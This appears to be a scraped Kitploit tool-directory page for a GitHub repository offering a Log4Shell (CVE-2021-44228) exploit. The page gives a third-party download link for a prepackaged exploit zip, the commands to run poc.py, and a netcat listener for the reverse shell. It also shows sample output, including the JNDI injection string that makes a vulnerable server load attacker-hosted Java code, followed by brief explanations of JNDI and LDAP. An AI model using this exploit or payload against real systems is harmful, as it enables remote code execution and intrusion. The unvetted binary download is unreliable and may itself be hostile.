Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Log4j-Exploit-CVE-2021-44228 — Exploit tool for CVE-2021-44228 (Log4Shell) that sets up a malicious LDAP server and delivers a Java payload to achieve remote code execution on vulnerable Log4j applications. | Kitploit
Tools/GitHubGitHub/willian-2-0-0-1/log4j-exploit-cve-2021-44228
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubwillian-2-0-0-1/log4j-exploit-cve-2021-44228

Log4j-Exploit-CVE-2021-44228

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

Exploit tool for CVE-2021-44228 (Log4Shell) that sets up a malicious LDAP server and delivers a Java payload to achieve remote code execution on vulnerable Log4j applications.

View Repository
134 years agoNot yet reviewed
Share

Log4j-Exploit-CVE-2021-44228

Log4Shell Vulnerability Test Tool https://log4shell.tools/

Exploit with java already included, to avoid creating an account etc..

http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
pip install -r requirements.txt
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
nc -lvnp 9001
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

Basic concept of log4j

What is JNDI

An Interface is a Java API for a directory service that allows Java software clients to discover and search for data and resources by name

What is LDAP

It is a directory access protocol. LDAP can be used to validate usernames and passwords with Docker, Jenkins, Kubernetes, Open VPN, and Linux Samba servers. LDAP single sign-on can also be used by system administrators to control access to an LDAP database.

FOR THOSE WHO WANT TO KNOW MORE ABOUT THE VULNERABILITY, SEE THE DOC BELOW:

https://www.lunasec.io/docs/blog/log4j-zero-day/

EXPLOIT WITHOUT JAVA INCLUDED

https://github.com/kozmer/log4j-shell-poc
Download Tool